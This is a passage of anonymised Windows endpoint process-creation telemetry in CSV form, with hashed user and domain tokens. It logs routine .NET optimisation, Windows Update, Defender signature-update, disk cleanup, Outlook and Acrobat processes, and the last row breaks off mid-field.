00:47:16.778074900+00:00,18012,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:17.927998+00:00,2021-06-25 00:47:39.587960800+00:00,f79c26a2-2f6c-46ce-9422-6d27232084a9,computerpii_0a470890c60768167990033d701e7bd881398861,181784,False,10.7740.19041.1052,False,11540474045178439,,11540474045178441,2021-06-25 00:47:17.757990+00:00,21360,2021-06-25 00:47:17.757990+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe,21360,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,174552,2020-12-02 20:58:16+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-25 00:47:17.088795300+00:00,2021-02-17 04:29:15.698814400+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,mscorsvw.exe,mscorsvw.exe,.NET Runtime Optimization Service
+1547,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:47:17.999793200+00:00,1240,ngentask.exe,"""NGenTask.exe"" /StopEvent:1344",PortableExecutable,2021-02-17 04:29:20.532877500+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,79816,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:16.790866400+00:00,5032,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:596",True,2021-06-25 00:47:16.557310900+00:00,6108,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:18.138928900+00:00,2021-06-25 00:47:39.588403800+00:00,afc35172-6f79-4e84-9c99-dd1b8184d34b,computerpii_0a470890c60768167990033d701e7bd881398861,181793,False,10.7740.19041.1052,False,11540474045178426,,11540474045178442,2021-06-25 00:47:16.790866400+00:00,5032,2021-06-25 00:47:16.790866400+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,5032,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-25 00:47:16.825817600+00:00,2021-02-17 04:29:20.532877500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service
+1548,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:47:18.008478+00:00,19300,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:47:17.999793200+00:00,1240,ngentask.exe,"""NGenTask.exe"" /StopEvent:1344",False,2021-06-25 00:47:16.790866400+00:00,5032,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:18.140368500+00:00,2021-06-25 00:47:39.588454700+00:00,7458ef30-8f71-4036-b354-585d4a88b2b7,computerpii_0a470890c60768167990033d701e7bd881398861,181794,False,10.7740.19041.1052,False,11540474045178442,,11540474045178443,2021-06-25 00:47:17.999793200+00:00,1240,2021-06-25 00:47:17.999793200+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,1240,16512,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-25 00:47:16.825817600+00:00,2021-02-17 04:29:20.532877500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1549,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:47:18.143759500+00:00,15504,ngentask.exe,"""NGenTask.exe"" /StopEvent:1328",PortableExecutable,2021-02-17 04:29:20.504956500+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,79312,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:16.778074900+00:00,18012,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:580",True,2021-06-25 00:47:16.557310900+00:00,6108,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:18.201436400+00:00,2021-06-25 00:47:39.588552500+00:00,c72e1e3c-80b3-4304-9ce4-51360f80471e,computerpii_0a470890c60768167990033d701e7bd881398861,181796,False,10.7740.19041.1052,False,11540474045178425,,11540474045178444,2021-06-25 00:47:16.778074900+00:00,18012,2021-06-25 00:47:16.778074900+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,18012,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-25 00:47:16.777546100+00:00,2021-02-17 04:29:20.504956500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service
+1550,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:47:18.152083300+00:00,17552,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:47:18.143759500+00:00,15504,ngentask.exe,"""NGenTask.exe"" /StopEvent:1328",False,2021-06-25 00:47:16.778074900+00:00,18012,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:18.201736500+00:00,2021-06-25 00:47:39.588601800+00:00,84afb081-e5ad-4d64-bc3b-b3999d48bf45,computerpii_0a470890c60768167990033d701e7bd881398861,181797,False,10.7740.19041.1052,False,11540474045178444,,11540474045178445,2021-06-25 00:47:18.143759500+00:00,15504,2021-06-25 00:47:18.143759500+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,15504,16512,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-25 00:47:16.777546100+00:00,2021-02-17 04:29:20.504956500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1551,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:18.163689500+00:00,9452,wuauclt.exe,"""wuauclt.exe"" /UpdateDeploymentProvider UpdateDeploymentProvider.dll /ClassId e396fc5e-a5c5-4589-8b56-7124f33ee1a9 /RunHandlerComServer",PortableExecutable,2021-04-14 01:10:16.553201900+00:00,C:\Windows\System32\wuauclt.exe,64008,970600bd493cac68a5b1efe9dbb626f9,2423ce1293c1980ee7dd4543efeb48b69634dbce875c830e7f8cd87f3c6d25b4,3f5c88006e75e1fbbd8de658d1d66aeac432de75,fd33757fa1522b4555e8d8d61bd18a07,6d17958c6527346036f35c6d9db2f5c8d820cbfbd043588304c7beddf7ea8641,9a4803b5c0e1a33396a4c816dbe57369241f419c,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:48:10.634688500+00:00,13224,MoUsoCoreWorker.exe,mousocoreworker.exe -Embedding,True,2021-06-10 00:46:10.653932100+00:00,504,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:18.204696700+00:00,2021-06-25 00:47:39.588653100+00:00,b2992da1-8299-42d8-9fda-00667d03f2e9,computerpii_0a470890c60768167990033d701e7bd881398861,181798,False,10.7740.19041.1052,False,11540474045137196,,11540474045178446,2021-06-10 00:48:10.634688500+00:00,13224,2021-06-10 00:48:10.634688500+00:00,\Device\HarddiskVolume3\Windows\System32\MoUsoCoreWorker.exe,13224,128,ActiveProcessStartkey,C:\Windows\System32,1553408,1990-07-31 23:15:30+00:00,2021-06-09 01:20:44.588993100+00:00,2021-06-10 00:48:10.654901200+00:00,2021-06-09 01:20:44.551541700+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,MoUSO Core Worker Process,MoUSOCoreWorker.exe,MoUSO Core Worker Process,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,wuauclt.exe,wuauclt.exe,Windows Update
+1552,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:18.275365700+00:00,7412,AM_Delta_Patch_1.341.1331.0.exe,"""AM_Delta_Patch_1.341.1331.0.exe"" WD /q",PortableExecutable,2021-06-25 00:47:18.207103900+00:00,C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.341.1331.0.exe,2486704,46e922a32922ab83cba7a3056b86c1c0,d097d04067bb47042b28b7c9e41798cd0ba30350da6e3318d603f1603629bf87,4f998d8dfa2c12c3cbb8e5272fcc81521fdb75b0,970600bd493cac68a5b1efe9dbb626f9,2423ce1293c1980ee7dd4543efeb48b69634dbce875c830e7f8cd87f3c6d25b4,3f5c88006e75e1fbbd8de658d1d66aeac432de75,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:18.163689500+00:00,9452,wuauclt.exe,"""wuauclt.exe"" /UpdateDeploymentProvider UpdateDeploymentProvider.dll /ClassId e396fc5e-a5c5-4589-8b56-7124f33ee1a9 /RunHandlerComServer",True,2021-06-10 00:48:10.634688500+00:00,13224,\Device\HarddiskVolume3\Windows\System32\MoUsoCoreWorker.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:19.009715200+00:00,2021-06-25 00:47:39.588892900+00:00,34f380db-bf09-4bbd-9c84-f5519c361e7b,computerpii_0a470890c60768167990033d701e7bd881398861,181803,False,10.7740.19041.1052,False,11540474045178446,,11540474045178447,2021-06-25 00:47:18.163689500+00:00,9452,2021-06-25 00:47:18.163689500+00:00,\Device\HarddiskVolume3\Windows\System32\wuauclt.exe,9452,128,ActiveProcessStartkey,C:\Windows\System32,64008,1970-11-28 05:49:59+00:00,2021-04-14 01:10:16.555182500+00:00,2021-06-25 00:47:18.160241400+00:00,2021-04-14 01:10:16.553201900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,wuauclt.exe,wuauclt.exe,Windows Update,Microsoft Corporation,Microsoft Malware Protection,1.341.1385.0,AM_Delta_Patch_1.341.1331.0.exe,AM_Delta_Patch_1.341.1331.0.exe,Microsoft Antimalware WU Stub
+1553,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:18.312940100+00:00,20464,MpSigStub.exe,MpSigStub.exe /stub 1.1.17800.4 /payload 1.341.1385.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.341.1331.0.exe WD /q,PortableExecutable,2020-11-11 01:11:41.879252300+00:00,C:\Windows\System32\MpSigStub.exe,799104,5221b7a59665153028fb57761ce560b9,0bc408c801441239f72d7df3dd6edbcdfb5313d6ae5a04c0a13e8c2dfc39f6d8,d65eae951fe09f39555951970ad03737520c7b12,46e922a32922ab83cba7a3056b86c1c0,d097d04067bb47042b28b7c9e41798cd0ba30350da6e3318d603f1603629bf87,4f998d8dfa2c12c3cbb8e5272fcc81521fdb75b0,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:18.275365700+00:00,7412,AM_Delta_Patch_1.341.1331.0.exe,"""AM_Delta_Patch_1.341.1331.0.exe"" WD /q",True,2021-06-25 00:47:18.163689500+00:00,9452,\Device\HarddiskVolume3\Windows\System32\wuauclt.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:19.012910600+00:00,2021-06-25 00:47:39.588942+00:00,c890e373-10e8-4ddc-909b-5b1eacf576bf,computerpii_0a470890c60768167990033d701e7bd881398861,181804,False,10.7740.19041.1052,False,11540474045178447,,11540474045178448,2021-06-25 00:47:18.275365700+00:00,7412,2021-06-25 00:47:18.275365700+00:00,\Device\HarddiskVolume3\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.341.1331.0.exe,7412,128,ActiveProcessStartkey,C:\Windows\SoftwareDistribution\Download\Install,2486704,2021-06-24 19:04:46+00:00,2021-06-25 00:39:34.251639800+00:00,2021-06-25 00:47:19.006208+00:00,2021-06-25 00:47:18.207103900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Malware Protection,1.341.1385.0,AM_Delta_Patch_1.341.1331.0.exe,AM_Delta_Patch_1.341.1331.0.exe,Microsoft Antimalware WU Stub,Microsoft Corporation,Microsoft Malware Protection,1.1.17800.4,MpSigStub.exe,MpSigStub.exe,Microsoft Malware Protection Signature Update Stub
+1554,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-25 00:47:19.125207400+00:00,3496,DismHost.exe,dismhost.exe {AB0EC6CA-8C68-4D84-895E-5715F36D63C4},PortableExecutable,2021-06-25 00:47:19.006208+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Temp\76A950B7-CFDF-463D-AED5-E785D54A211E\DismHost.exe,146256,e5d5e9c1f65b8ec7aa5b7f1b1acdd731,e30508e2088bc16b2a84233ced64995f738deaef2366ac6c86b35c93bbcd9d80,dbb14dcda6502ab1d23a7c77d405dafbcbeb439e,ef759fbf8aee871c4accac4a2ef8f9ee,87d5153bec20f9b2e61fb6c6e4f0e49e48ae50691912ce793a599299d31ef671,c94b3634bbf439181de566c1837969daa7b26f70,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:47:16.572487100+00:00,10980,cleanmgr.exe,cleanmgr.exe /autoclean /d C:,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:19.308910700+00:00,2021-06-25 00:47:39.591805300+00:00,6fecf276-5da0-468d-bbf5-55c71e8eccee,computerpii_0a470890c60768167990033d701e7bd881398861,181856,False,10.7740.19041.1052,False,11540474045178407,,11540474045178449,2021-06-25 00:47:16.572487100+00:00,10980,2021-06-25 00:47:16.572487100+00:00,cleanmgr.exe,10980,256,ActiveProcessStartkey,C:\Windows\System32,320000,1983-10-25 17:51:00+00:00,2021-04-14 01:10:31.036813600+00:00,2021-06-25 00:47:16.564920500+00:00,2021-04-14 01:10:31.033943500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412828,469412828,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,CLEANMGR,CLEANMGR.DLL,Disk Space Cleanup Manager for Windows,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,dismhost,DismHost.exe,Dism Host Servicing Process
+1555,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 05:30:35.262832400+00:00,352,HxTsr.exe,"""HxTsr.exe"" -ServerName:Hx.IPC.Server",PortableExecutable,2021-05-03 00:36:44.904415600+00:00,C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\HxTsr.exe,93184,dcd2072a6b40e4fef68718a141941805,f45eb7734f25a0d84a96d6f6448dba929775bd8db3c22224ebcbd45aea91b791,792568e941e215bd8f09632492c73a2fcd6bf862,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 05:30:35.805705700+00:00,2021-06-23 05:31:15.123663600+00:00,ce5aef78-57fe-4536-8b74-0234cdbfbb77,computerpii_0a470890c60768167990033d701e7bd881398861,163560,False,10.7740.19041.1052,False,11540474045136908,,11540474045173707,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Office,16.0.13426.20920,HxTsr,HxTsr.exe,Microsoft Outlook Communications
+1556,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:22.117798700+00:00,5760,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:19.362041700+00:00,5684,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UWEMRD7K\FilePII_f7cb604f766e93a9393ab91047022e32e49197c5.pdf""",False,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:22.178231200+00:00,2021-06-23 01:23:34.706460+00:00,dbe413ab-0f55-42c6-bed8-d238e6511f2d,computerpii_0a470890c60768167990033d701e7bd881398861,158015,False,10.7740.19041.1052,False,11540474045172397,,11540474045172410,2021-06-23 01:22:19.362041700+00:00,5684,2021-06-23 01:22:19.362041700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,5684,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,3796704,2021-05-28 05:30:12+00:00,2021-05-28 05:58:58+00:00,2021-06-23 01:22:19.361002600+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC ,,,,,,
+1557,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:22.227299100+00:00,9568,AcroCEF.exe,"""AcroCEF.exe"" --type=renderer --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --touch-events=enabled --field-trial-handle=1908,12044919889243289069,12882310414426751854,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-gpu-compositing --lang=en-US --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=8056281981020920197 --renderer-client-id=2 --mojo-platform-channel-handle=1900 --allow-no-sandbox-job /prefetch:1",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat 